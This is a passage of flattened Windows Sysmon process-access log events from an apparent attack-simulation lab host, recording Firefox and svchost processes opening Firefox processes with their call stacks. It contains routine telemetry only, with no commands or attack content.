Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000018859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.273{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.273{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.273{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program 